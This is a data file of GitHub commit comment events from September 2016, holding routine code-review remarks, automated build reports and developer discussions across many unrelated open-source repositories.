{"id":"4553682118","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18996589,"position":null,"line":null,"path":null,"commit_id":"9d6b9469f4ac94c2cbe83a8b11124a0819149f1a","created_at":"2016-09-13T06:24:07Z","updated_at":"2016-09-13T06:24:07Z","body":"Build report #159505034 for sha 9d6b9469f4ac94c2cbe83a8b11124a0819149f1a:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%282/2%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-7.16%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-2%20error%28s%29-yellow.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-1785%20/%208398%20%2821.26%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-13.96%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-13T06:24:07Z"}
{"id":"4553682791","type":"CommitCommentEvent","actor":{"login":"czardoz"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18996591,"position":14,"line":155,"path":"lib/collection/url.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-13T06:24:21Z","updated_at":"2016-09-13T06:24:21Z","body":"The test is skipped on develop, for a reason too. @kunagpal, you've unskipped the test in your branch, which is why it's failing now. "}},"created_at":"2016-09-13T06:24:21Z"}
{"id":"4553684118","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":18996596,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-13T06:24:46Z","updated_at":"2016-09-13T06:24:46Z","body":"@snicolet Ouch! Of course I meant pinnersForKing, thank you for pointing this out.\r\n\r\nIf [this test](http://tests.stockfishchess.org/tests/view/57d6b2ca0ebc59030fbe5239) fails then I'm in favour to rename it to spidersForKing, otherwise I would keep 'pinnersForKing'.\r\n\r\nIn regard to Rocky640's comment I must say that I'm a bit lost with the term 'Disco'.\r\n(Although being fellow townsman of the 'God father of Disco' Giorgio Moroder I must say that I'm a engrained Rocker ;-) )"}},"created_at":"2016-09-13T06:24:46Z"}
{"id":"4553684638","type":"CommitCommentEvent","actor":{"login":"gau-veldt"},"repo":{"name":"gau-veldt/OmegaRising"},"payload":{"comment":{"id":18996597,"position":null,"line":null,"path":null,"commit_id":"45af9478b70d393b7bb85d69bdf856478a0af2ba","created_at":"2016-09-13T06:24:57Z","updated_at":"2016-09-13T06:24:57Z","body":"Screenshot referenced by the commit:\r\n![screenshot](https://cloud.githubusercontent.com/assets/1862162/18463515/9e728c6c-793f-11e6-8286-59fea4e2b9fd.png)\r\n"}},"created_at":"2016-09-13T06:24:57Z"}
{"id":"4553685106","type":"CommitCommentEvent","actor":{"login":"tarunchhabra06"},"repo":{"name":"tarunchhabra06/Handwritten-Digit-Recognition"},"payload":{"comment":{"id":18996599,"position":null,"line":null,"path":null,"commit_id":"8de763a5094b93d09918663fc7e318fe1ad28af4","created_at":"2016-09-13T06:25:07Z","updated_at":"2016-09-13T06:25:07Z","body":"Read me "}},"created_at":"2016-09-13T06:25:07Z"}
{"id":"4553685108","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18996598,"position":null,"line":null,"path":null,"commit_id":"7976dc819b20b00912fe9d23becc5b5aa6a47c3c","created_at":"2016-09-13T06:25:07Z","updated_at":"2016-09-13T06:25:07Z","body":"Build report #159505148 for sha 7976dc819b20b00912fe9d23becc5b5aa6a47c3c:\n\n[![UnitTests](https://img.shields.io/badge/unittests-failed%20%281/3%29%20-red.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-8.04%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-2%20error%28s%29-yellow.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-1785%20/%208404%20%2821.24%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-16.60%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-13T06:25:07Z"}
{"id":"4553686767","type":"CommitCommentEvent","actor":{"login":"phistuck"},"repo":{"name":"google/closure-compiler"},"payload":{"comment":{"id":18996602,"position":null,"line":null,"path":null,"commit_id":"229d49fa2dc9243f03a8b13b2a285d229eade5f6","created_at":"2016-09-13T06:25:37Z","updated_at":"2016-09-13T06:25:37Z","body":"Should `resources.json` really be included in the repository? It looks like a build-time generated artifact."}},"created_at":"2016-09-13T06:25:37Z"}
{"id":"4553689719","type":"CommitCommentEvent","actor":{"login":"johnynek"},"repo":{"name":"ianoc/rules_scala"},"payload":{"comment":{"id":18996607,"position":28,"line":216,"path":"scala/scala.bzl","commit_id":"2aaff851d8ede345cbc8736c32204d47a7940ff1","created_at":"2016-09-13T06:26:34Z","updated_at":"2016-09-13T06:26:34Z","body":"Where are we using this?"}},"created_at":"2016-09-13T06:26:34Z"}
{"id":"4553694423","type":"CommitCommentEvent","actor":{"login":"SalamiArmy"},"repo":{"name":"Warewolf-ESB/Warewolf"},"payload":{"comment":{"id":18996616,"position":null,"line":null,"path":null,"commit_id":"0ebaf8e113e391c08cd752f03b86a509612bc613","created_at":"2016-09-13T06:28:09Z","updated_at":"2016-09-13T06:28:09Z","body":"Please stop committing UI map backups. Your change to Dev/Warewolf.UITests/UIMap.cs is also wrong. Assert actions should all be post-asserts. The asserts for previous test steps are the pre-asserts for the next test step, so only a test step that is always the first step of an entire test run can have pre-asserts."}},"created_at":"2016-09-13T06:28:09Z"}
{"id":"4553694477","type":"CommitCommentEvent","actor":{"login":"mweibel"},"repo":{"name":"pstadler/dtox"},"payload":{"comment":{"id":18996617,"position":null,"line":null,"path":null,"commit_id":"23a8e171af23c5077cb2698ca37fc50ffd434eef","created_at":"2016-09-13T06:28:10Z","updated_at":"2016-09-13T06:28:10Z","body":"oh ;) 👍 "}},"created_at":"2016-09-13T06:28:10Z"}
{"id":"4553697075","type":"CommitCommentEvent","actor":{"login":"ianoc"},"repo":{"name":"ianoc/rules_scala"},"payload":{"comment":{"id":18996628,"position":28,"line":216,"path":"scala/scala.bzl","commit_id":"2aaff851d8ede345cbc8736c32204d47a7940ff1","created_at":"2016-09-13T06:29:00Z","updated_at":"2016-09-13T06:29:00Z","body":"These are Jvm style flags the Jvm process during startup should just pick them up with no extra wrapping from what I can tell. I haven't had a chance to pass some good opts through here yet tho. Been getting internal builds green using this. "}},"created_at":"2016-09-13T06:29:00Z"}
{"id":"4553703234","type":"CommitCommentEvent","actor":{"login":"SitiFathimahMuhiddin"},"repo":{"name":"1601-mma2013/UI-controller"},"payload":{"comment":{"id":18996640,"position":null,"line":null,"path":null,"commit_id":"66af7e1e79571b194ead3b8e9c75702b7e2627b9","created_at":"2016-09-13T06:31:03Z","updated_at":"2016-09-13T06:31:03Z","body":"2. Modeling\r\na. Personas\r\nName - Secondary Student to College student.\r\nAge - 15yrs to 18yrs old.\r\nGender - Male and Female.\r\nOccupation – Student\r\nFaculty – Faculty of Creative Multimedia\r\nStatus – Single\r\nFavourite quote - “Have patience. All things are difficult before they become easy.”  -  Saadi \r\nBio \r\nMost of the secondary school student still new with this apps  in this era, their also newly introduced this application. Most of them didn't know the existence of these kind of apps until they go to college, at the time they need to maintain their laptop capability for the sake of their assignment. For example, Adam is a student at Multimedia University. He uses his computer to study and to complete his various assignments. He is interested in knowing the capabilities of his computer so that he can use it to its fullest potential. \r\n1. Patterns in user and customer behaviours\r\nPattern user \r\n\r\nLazy \t\t          hardworking\r\n\r\nSleeps early\t          Sleeps late\r\n \r\nDon’t like \t\tLike to Discover \r\nto Discover New\tNew Items \r\n\r\nCustomer behaviour \r\nPositive person, have initiative to know more about their PC condition, space, ram.\r\n2. Attitudes\r\nEasy going, friendly, adventurous, hardworking. \r\n3. Aptitudes\r\nWants perfection in fps and details. \r\nWants PC to run smoothly without any glitch. \r\n4. Goals\r\nLet the user have the ability to personalise any visual asset displayed on screen to their preferred choice.\r\nTo let the user know the fullest potential of their computer.\r\n5. Environments\r\nAt home in the user’s room, the user will always keep update about the capability of their pc no matter to play games or doing their assignment.\r\nIn the classroom, the technician will keep update on the stability of the lab pc for student and lecture used.\r\n6. Tools\r\nComputer – Processing, github\r\n7. Challenges\r\n \r\nTo make the program run smoothly with no delay in the application. \r\n\r\n1. Workflows among multiple people\r\nMust have a team to create a project and carry out the work with a specific part; Designer, Communication Designer and manager. The designer is the one who brainstorms and comes out with the strongest idea, the design communicator is the one who has to find an idea on how to create connection in the project and the manager has to manage the progress of the project and make sure it is up to date.\r\nWeek 10\r\n- Project proposal\r\nWeek 11\r\n- Floor plan\r\nWeek 12 \r\n- Coding\r\nWeek 13 \r\n- Test project\r\nWeek 14\r\n- Presentation \r\n2. Environments \r\nClassroom, lab\r\n3. Artifacts \r\nRainmeter, Desktop Theme Manager"}},"created_at":"2016-09-13T06:31:03Z"}
{"id":"4553703921","type":"CommitCommentEvent","actor":{"login":"ekg"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":18996645,"position":null,"line":null,"path":null,"commit_id":"9d4cb57b9cbd14ed9be8097fe41a77d5a488d9f5","created_at":"2016-09-13T06:31:17Z","updated_at":"2016-09-13T06:31:17Z","body":"Thanks for the fix. I'd be comfortable with a test showing it works where\nwe know the SCCs that are expected. Do you have one handy?\n\nOn Tue, Sep 13, 2016, 02:05 adamnovak <notifications@github.com> wrote:\n\n> I think I've fixed up DFS in my experiment-freeze branch, but I'm not\n> convinced I haven't broken something there with respect to strongly\n> connected component finding. I tried to implement a generalization of the\n> concept to bidirected graphs from a very notation-heavy 1996 math paper\n> that I can't say I really understood.\n>\n> On Sep 12, 2016 2:46 PM, \"Erik Garrison\" <notifications@github.com> wrote:\n>\n> Yeah this looks like a problem. Sorry I thought I had dealt with it but\n> didn't loop back to deal with it as there had been only one thing using\n> this function until recently.\n>\n> You can turn the unrolling code on by default to work around this. I will\n> look into fixing the DFS stuff tomorrow.\n>\n> On Mon, Sep 12, 2016, 23:22 adamnovak <notifications@github.com> wrote:\n>\n> > @ekg <https://github.com/ekg> what does a DFS mean on Node*s and not\n> > NodeTraversals? This looks to be just following all the edges in a\n> > from->to direction, irrespective of whether those edges are actually\n> > attached to the start or end of the node. So you can start at a node and\n> > eventually reach nodes that you can't thread a proper\n> > alternating-nodes-and-edges path to.\n> >\n> > There's also the case where a node that is topologically upstream gets\n> > visited later, because the root loop got to one of its children first.\n> >\n> > I think this dfs thing is the root cause of a problem I'm having with\n> > is_acyclic, where it thinks that a graph with a cycle between two nodes\n> of\n> > a normal from->to edge and a from_start, to_end edge is acyclic,\n> depending\n> > on the ID order of the nodes.\n> >\n> > —\n> > You are receiving this because you were mentioned.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/vgteam/vg/commit/9d4cb57b9cbd14ed9be8097fe41a77\n> d5a488d9f5#commitcomment-18991885>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/\n> AAI4EfojhYYl1ZY9aDV9zAzKD59f3mg1ks5qpcKNgaJpZM4J7C69>\n> > .\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <\n> https://github.com/vgteam/vg/commit/9d4cb57b9cbd14ed9be8097fe41a77d5a488d9f5#commitcomment-18992244\n> >,\n> or mute the thread\n> <\n> https://github.com/notifications/unsubscribe-auth/AE0_XyUOYDuxL6s5oOprX3-DNL1f30fhks5qpcg1gaJpZM4J7C69\n> >\n> .\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/vgteam/vg/commit/9d4cb57b9cbd14ed9be8097fe41a77d5a488d9f5#commitcomment-18994009>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAI4Ec6Jy1ayH6UV-f7ElemNJOM8ctJ4ks5qpejbgaJpZM4J7C69>\n> .\n>\n"}},"created_at":"2016-09-13T06:31:17Z"}
{"id":"4553704084","type":"CommitCommentEvent","actor":{"login":"Nikolas83"},"repo":{"name":"nikolay-gavrilov/lemon-school"},"payload":{"comment":{"id":18996646,"position":null,"line":null,"path":null,"commit_id":"addd76519b35b3c36190461f31ae71cfd1e20c01","created_at":"2016-09-13T06:31:20Z","updated_at":"2016-09-13T06:31:20Z","body":"Ага. Просто ввела в заблуждение ширина макета 1200px))\r\n\r\n"}},"created_at":"2016-09-13T06:31:20Z"}
{"id":"4553704979","type":"CommitCommentEvent","actor":{"login":"leiradel"},"repo":{"name":"libretro/gw-libretro"},"payload":{"comment":{"id":18996647,"position":null,"line":null,"path":null,"commit_id":"284b15c58260403343a4f4e773b613d6db8da8a6","created_at":"2016-09-13T06:31:37Z","updated_at":"2016-09-13T06:31:37Z","body":"I believe some cores had their info files duplicated in their own repositories, and I just followed the example.\r\n\r\nI'll check with @Twinaphex if they should exist only in libretro-super."}},"created_at":"2016-09-13T06:31:37Z"}
{"id":"4553706685","type":"CommitCommentEvent","actor":{"login":"buddhi1980"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":18996652,"position":null,"line":null,"path":null,"commit_id":"b84bec066f53fdf3c9b3ad60ce27a902826a2dcd","created_at":"2016-09-13T06:32:12Z","updated_at":"2016-09-13T06:32:12Z","body":"It's very good change.\r\nBecause file format is changed we need to remember to regenerate thumbnail cache on the server. "}},"created_at":"2016-09-13T06:32:12Z"}
{"id":"4553708454","type":"CommitCommentEvent","actor":{"login":"basdelfos"},"repo":{"name":"basdelfos/beta-osd-v2"},"payload":{"comment":{"id":18996656,"position":null,"line":null,"path":null,"commit_id":"bed1c1c80258fbaefbf1c5d035753aa4146ac966","created_at":"2016-09-13T06:32:44Z","updated_at":"2016-09-13T06:32:44Z","body":"Yeah sorry, the hex is for PAL, forgot that you use NTSC (and I use PAL :smile:)\r\nThis is really strange. I don't use Arduino IDE to compile the hex as i hate the IDE. The sourcecode is written with PlatformIO IDE which has much more features and is more developer friendly (based on the open-source Atom IDE). You can download it from: http://platformio.org/platformio-ide.\r\nYou only need to open the project folder 'beta-osd' and compile and upload to the minimOSD.\r\n"}},"created_at":"2016-09-13T06:32:44Z"}
{"id":"4553711513","type":"CommitCommentEvent","actor":{"login":"zzyyloves"},"repo":{"name":"zzyyloves/node-chatroom"},"payload":{"comment":{"id":18996662,"position":null,"line":null,"path":null,"commit_id":"14738b2f6fb6a2eb6dc4e65e635bcb797bc610aa","created_at":"2016-09-13T06:33:46Z","updated_at":"2016-09-13T06:33:46Z","body":"init commit"}},"created_at":"2016-09-13T06:33:46Z"}
{"id":"4553715101","type":"CommitCommentEvent","actor":{"login":"rawlingsj"},"repo":{"name":"fabric8io/gofabric8"},"payload":{"comment":{"id":18996673,"position":83,"line":0,"path":"cmds/install.go","commit_id":"21c75937f024e615884973bbc2bdac7dee8d5897","created_at":"2016-09-13T06:34:54Z","updated_at":"2016-09-13T06:34:54Z","body":"Yeah it prompts for a password just fine. "}},"created_at":"2016-09-13T06:34:54Z"}
{"id":"4553717449","type":"CommitCommentEvent","actor":{"login":"yyjdelete"},"repo":{"name":"yyjdelete/Swiper"},"payload":{"comment":{"id":18996676,"position":26,"line":87,"path":"src/js/scrollbar.js","commit_id":"a41f4819f92336106b853688f5d4ec081a9ddde4","created_at":"2016-09-13T06:35:39Z","updated_at":"2016-09-13T06:35:39Z","body":"Should also be `sb.draggableEvents` instead of `s.draggableEvents`?"}},"created_at":"2016-09-13T06:35:39Z"}
{"id":"4553718902","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18996679,"position":16,"line":128,"path":"en/source/link_aggregation.rst","commit_id":"b95fa2ff8a9a3ae5e8adc4c9ce30eb3f79045da4","created_at":"2016-09-13T06:36:08Z","updated_at":"2016-09-13T06:36:08Z","body":"`..onry::`を使用したりして適切な表示にできるか試しましたが、\r\nかなりめんどうなことになりそうですので、このままとさせていただきます。\r\n"}},"created_at":"2016-09-13T06:36:08Z"}
{"id":"4553719662","type":"CommitCommentEvent","actor":{"login":"LexManos"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":18996680,"position":null,"line":null,"path":null,"commit_id":"45097fed0c054407dedcf4cb9bab0e54b977d7e7","created_at":"2016-09-13T06:36:21Z","updated_at":"2016-09-13T06:36:21Z","body":"From a code point of view, every energy system is pretty much the same.\r\n'hasEnergy()?' 'giveEnergy()'\r\nThats what this is, the lore of how that energy is created, how it's transferred, how loss works, etc.. Thats all up to modders to decided in how they implement it.\r\nIF modders want to be discriminating and create sub-energy systems then they can. It's as simple as 'public interface ThaumcraftMana extends IEnergyStorage{}' Caps.register(ThamcraftMana.class...)\r\n\r\nThere you go the code works exactly the same. The point of this particular implementation is for things that don't care. And to serve as a base for other systems on how to do it cleanly.  Its also up to modders to do their own energy networks, pipe systems, generators, anything that is actually end user facing content. \r\n\r\nIdeally, and just off the cuff, what I imagine people would do is for consumers like a furnace, they just implement this cap and don't care whatever it is providing. But specific non-generic things like say a Thaumcraft {I keep using this as its a cool mod and the first that pops to mind with a specific energy system} which have a Magical Furnace that they only want powered by mana, they discriminate in their getCap function. But their providers, like the RF fluxducts, would do something like if machine.hasCap(REDSTONE_FLUX) || machine.hasCap(ENERGY)\r\n\r\nMeh im rambling here, and i'm not good at articulating my thoughts. But my point is, a lot of people don't CARE about the lore of the energy. This allows them to not care. And it being integrated with Forge means that when minecraft updates come, those who don't care can just update. Instead of waiting for the other APIs, or in the case of RF the 30,000 slightly different unofficial updates."}},"created_at":"2016-09-13T06:36:21Z"}
{"id":"4553720513","type":"CommitCommentEvent","actor":{"login":"sggua"},"repo":{"name":"sggua/goit"},"payload":{"comment":{"id":18996681,"position":22,"line":87,"path":"JavaCoreGoIt/src/module04/task46/Bank.java","commit_id":"321dd44f7c2e1a5c66f544df27873b84dd238014","created_at":"2016-09-13T06:36:39Z","updated_at":"2016-09-13T06:36:39Z","body":"Изменения задания были после того, как код был написан.\r\nЯ перепишу, но задание было некорректным, отсюда и доп.поле withdrawal"}},"created_at":"2016-09-13T06:36:39Z"}
{"id":"4553722384","type":"CommitCommentEvent","actor":{"login":"snak3ater"},"repo":{"name":"BenzoRoms/packages_apps_Settings"},"payload":{"comment":{"id":18996685,"position":null,"line":null,"path":null,"commit_id":"552f2e4b5f5f9db2c3818fad86a18c49559dfda4","created_at":"2016-09-13T06:37:16Z","updated_at":"2016-09-13T06:37:16Z","body":"SwitchPreference is working fine for you?\r\nI am getting this error during compilation:\r\n\r\npackages/apps/Settings/src/com/android/settings/preference/SystemSettingSwitchPreference.java:60: The method isPersisted() of type SystemSettingSwitchPreference must override or implement a supertype method.\r\n\r\nIf ' @Override' is removed from isPersisted method.. Then Switch state reverts back to its default value as soon as settings app is closed. \r\nDid you observe any weird switch behavior in the build?"}},"created_at":"2016-09-13T06:37:16Z"}
{"id":"4553724553","type":"CommitCommentEvent","actor":{"login":"reyang"},"repo":{"name":"Azure/device-discovery-cli"},"payload":{"comment":{"id":18996690,"position":2,"line":1,"path":"src/lib/usb-mapping.csv","commit_id":"dd056cbfa42f3f21c69099e8cac8dddb3a629e32","created_at":"2016-09-13T06:37:57Z","updated_at":"2016-09-13T06:37:57Z","body":"usb -> USB"}},"created_at":"2016-09-13T06:37:57Z"}
{"id":"4553725853","type":"CommitCommentEvent","actor":{"login":"chrisjansky"},"repo":{"name":"chrisjansky/veneo"},"payload":{"comment":{"id":18996694,"position":null,"line":null,"path":null,"commit_id":"1c2e0c73eef487782133e59179e67e38c516ccd5","created_at":"2016-09-13T06:38:23Z","updated_at":"2016-09-13T06:38:23Z","body":"Toto není dobře, reset marginu už je obsažený v normalize.css, který se instaluje přes bower."}},"created_at":"2016-09-13T06:38:23Z"}
{"id":"4553725879","type":"CommitCommentEvent","actor":{"login":"brinxmat"},"repo":{"name":"digibib/ls.ext"},"payload":{"comment":{"id":18996696,"position":11,"line":381,"path":"redef/services/src/main/java/no/deichman/services/entity/repository/SPARQLQueryBuilder.java","commit_id":"481319fc719541a93a84f8bac37e39d6c28c8fd8","created_at":"2016-09-13T06:38:24Z","updated_at":"2016-09-13T06:38:24Z","body":"Should probably express the IRI bound in ?pub as an IRI in each group"}},"created_at":"2016-09-13T06:38:24Z"}
{"id":"4553728439","type":"CommitCommentEvent","actor":{"login":"SubJunk"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18996701,"position":null,"line":null,"path":null,"commit_id":"cec32071034de73cdd2562852f32f6f0ab9bd846","created_at":"2016-09-13T06:39:13Z","updated_at":"2016-09-13T06:39:13Z","body":"@Sami32 I agree but also don't really care :) my priority is that code is stable and it works. Secondary to that is how nice it is. On an open source project sometimes people will contribute ugly code that has nice functionality and no one wants to reformat it, so I would rather merge that than miss out on functionality"}},"created_at":"2016-09-13T06:39:13Z"}
{"id":"4553735636","type":"CommitCommentEvent","actor":{"login":"reyang"},"repo":{"name":"Azure/device-discovery-cli"},"payload":{"comment":{"id":18996714,"position":null,"line":null,"path":null,"commit_id":"dd056cbfa42f3f21c69099e8cac8dddb3a629e32","created_at":"2016-09-13T06:41:31Z","updated_at":"2016-09-13T06:41:31Z","body":"approved"}},"created_at":"2016-09-13T06:41:31Z"}
{"id":"4553736478","type":"CommitCommentEvent","actor":{"login":"elinaru"},"repo":{"name":"caciviclab/caciviclab.github.io"},"payload":{"comment":{"id":18996716,"position":null,"line":null,"path":null,"commit_id":"8e0e7c29e084ed871684cce8d1227f2b7db7f0bb","created_at":"2016-09-13T06:41:48Z","updated_at":"2016-09-13T06:41:48Z","body":"Updated link text to mock-ups"}},"created_at":"2016-09-13T06:41:48Z"}
{"id":"4553737023","type":"CommitCommentEvent","actor":{"login":"kholia"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18996717,"position":null,"line":null,"path":null,"commit_id":"67d2d3855f604a3e4559a959bbb92f83a894824c","created_at":"2016-09-13T06:42:00Z","updated_at":"2016-09-13T06:42:00Z","body":"@magnumripper The convention is to use 4 spaces for indentation in Python world. This change will make it harder to pull changes from upstream code. Should we revert this?"}},"created_at":"2016-09-13T06:42:00Z"}
{"id":"4553743893","type":"CommitCommentEvent","actor":{"login":"mapfau"},"repo":{"name":"mapfau/inputstream.mpd"},"payload":{"comment":{"id":18996738,"position":null,"line":null,"path":null,"commit_id":"45b23b4bcc4a714182c1209e3039d52613753794","created_at":"2016-09-13T06:44:11Z","updated_at":"2016-09-13T06:44:11Z","body":"thx for reporting, encrypted media is broken with this commit, fix will come in some minutes"}},"created_at":"2016-09-13T06:44:11Z"}
{"id":"4553744830","type":"CommitCommentEvent","actor":{"login":"Ivorius"},"repo":{"name":"chrisjansky/veneo"},"payload":{"comment":{"id":18996741,"position":null,"line":null,"path":null,"commit_id":"1c2e0c73eef487782133e59179e67e38c516ccd5","created_at":"2016-09-13T06:44:26Z","updated_at":"2016-09-13T06:44:26Z","body":"Tak tedy nevím co dělám špatně, bower dependencies jsem nechal nainstalovat, dám gulp aby všechno vygeneroval a když se na to dívám, tak mám margin kolem body 8px. Můžeš tedy zkusit mi to nechat vygenerovat ty? Protože určitě to nějak blbě spouštím, protože třeba ani css nemám minifikované."}},"created_at":"2016-09-13T06:44:26Z"}
{"id":"4553745620","type":"CommitCommentEvent","actor":{"login":"wa1874"},"repo":{"name":"wa1874/w"},"payload":{"comment":{"id":18996744,"position":null,"line":null,"path":null,"commit_id":"3c978860157410f178a0ad13ade67df9f273ddad","created_at":"2016-09-13T06:44:43Z","updated_at":"2016-09-13T06:44:43Z","body":"head"}},"created_at":"2016-09-13T06:44:43Z"}
{"id":"4553746787","type":"CommitCommentEvent","actor":{"login":"wa1874"},"repo":{"name":"wa1874/w"},"payload":{"comment":{"id":18996748,"position":5,"line":5,"path":"README.md","commit_id":"3c978860157410f178a0ad13ade67df9f273ddad","created_at":"2016-09-13T06:45:06Z","updated_at":"2016-09-13T06:45:06Z","body":"head"}},"created_at":"2016-09-13T06:45:06Z"}
{"id":"4553749679","type":"CommitCommentEvent","actor":{"login":"wa1874"},"repo":{"name":"wa1874/w"},"payload":{"comment":{"id":18996754,"position":4,"line":4,"path":"README.md","commit_id":"3c978860157410f178a0ad13ade67df9f273ddad","created_at":"2016-09-13T06:45:55Z","updated_at":"2016-09-13T06:45:55Z","body":"head"}},"created_at":"2016-09-13T06:45:55Z"}
{"id":"4553750461","type":"CommitCommentEvent","actor":{"login":"wa1874"},"repo":{"name":"wa1874/w"},"payload":{"comment":{"id":18996757,"position":null,"line":null,"path":null,"commit_id":"3c978860157410f178a0ad13ade67df9f273ddad","created_at":"2016-09-13T06:46:11Z","updated_at":"2016-09-13T06:46:11Z","body":"head"}},"created_at":"2016-09-13T06:46:11Z"}
{"id":"4553754273","type":"CommitCommentEvent","actor":{"login":"mattbenic"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":18996764,"position":7,"line":null,"path":"Source/AtomicNET/NETScript/CSComponentAssembly.cpp","commit_id":"9a0ac4aa9e6733241e1f5dcbb9d17a1ab05a4cac","created_at":"2016-09-13T06:47:22Z","updated_at":"2016-09-13T06:47:22Z","body":"Seeing lots of tabs being introduced in this commit"}},"created_at":"2016-09-13T06:47:22Z"}
{"id":"4553755303","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18996767,"position":279,"line":4010,"path":"src/pocketmine/Player.php","commit_id":"049aded7c4abfab7f4bef666f93253fbaa3b9021","created_at":"2016-09-13T06:47:41Z","updated_at":"2016-09-13T06:47:41Z","body":"I am sure thats not correct"}},"created_at":"2016-09-13T06:47:41Z"}
{"id":"4553755712","type":"CommitCommentEvent","actor":{"login":"shal4skull"},"repo":{"name":"shal4skull/assignment-3"},"payload":{"comment":{"id":18996768,"position":null,"line":null,"path":null,"commit_id":"b48d24be7359095a23392288f52cba86b5d0c530","created_at":"2016-09-13T06:47:48Z","updated_at":"2016-09-13T06:47:48Z","body":"Test case 1"}},"created_at":"2016-09-13T06:47:48Z"}
{"id":"4553758478","type":"CommitCommentEvent","actor":{"login":"shal4skull"},"repo":{"name":"shal4skull/assignment-3"},"payload":{"comment":{"id":18996781,"position":null,"line":null,"path":null,"commit_id":"5ff584f213e177c043cf144599adfa2b32c81b5c","created_at":"2016-09-13T06:48:39Z","updated_at":"2016-09-13T06:48:39Z","body":"Test case1"}},"created_at":"2016-09-13T06:48:39Z"}
{"id":"4553759150","type":"CommitCommentEvent","actor":{"login":"Ivorius"},"repo":{"name":"chrisjansky/veneo"},"payload":{"comment":{"id":18996784,"position":null,"line":null,"path":null,"commit_id":"1c2e0c73eef487782133e59179e67e38c516ccd5","created_at":"2016-09-13T06:48:53Z","updated_at":"2016-09-13T06:48:53Z","body":"Mám ten commit revertnout nebo smazat a force push."}},"created_at":"2016-09-13T06:48:53Z"}
{"id":"4553759525","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18996788,"position":39,"line":63,"path":"src/pocketmine/command/defaults/XpCommand.php","commit_id":"049aded7c4abfab7f4bef666f93253fbaa3b9021","created_at":"2016-09-13T06:49:01Z","updated_at":"2016-09-13T06:49:01Z","body":"level up is client sided on leveling up 5 level. You shouldn't have to worry about that"}},"created_at":"2016-09-13T06:49:01Z"}
{"id":"4553761170","type":"CommitCommentEvent","actor":{"login":"kpettinga"},"repo":{"name":"ObjectiveSubject/cgu"},"payload":{"comment":{"id":18996796,"position":null,"line":null,"path":null,"commit_id":"8fed971e65b6af1890c15c6321de4fab809a2bad","created_at":"2016-09-13T06:49:29Z","updated_at":"2016-09-13T06:49:29Z","body":"#88 "}},"created_at":"2016-09-13T06:49:29Z"}
{"id":"4553763793","type":"CommitCommentEvent","actor":{"login":"shun159"},"repo":{"name":"shun159/trema"},"payload":{"comment":{"id":18996804,"position":null,"line":null,"path":null,"commit_id":"8db8c885b9f2c3ceeaaad2e0f733b4f6c1ef8064","created_at":"2016-09-13T06:50:16Z","updated_at":"2016-09-13T06:50:16Z","body":"これもセットで\r\n\r\n```ruby\r\nrequire 'bindata'\r\nrequire 'pio/open_flow/transaction_id'\r\n\r\nmodule Pio\r\n  # OpenFlow message header parser\r\n  class OpenFlowHeaderParser < BinData::Record\r\n    endian :big\r\n\r\n    uint8 :ofp_version\r\n    uint8 :message_type\r\n    uint16 :message_length\r\n    virtual assert: -> { message_length >= num_bytes }\r\n    transaction_id :transaction_id\r\n    string :body, read_length: -> {message_length - 8}\r\n    rest :leftover\r\n  end\r\n\r\n  # OpenFlow message header.\r\n  class OfpHeader < BinData::Record\r\n    endian :big\r\n\r\n    uint8 :ofp_version, value: :version_value\r\n    virtual assert: -> { ofp_version == version_value }\r\n    uint8 :message_type, value: :message_type_value\r\n    virtual assert: -> { message_type == message_type_value }\r\n    uint16 :message_length, initial_value: -> { length + body_length }\r\n    transaction_id :transaction_id, initial_value: 0\r\n\r\n    def length\r\n      8\r\n    end\r\n  end\r\nend\r\n```"}},"created_at":"2016-09-13T06:50:16Z"}
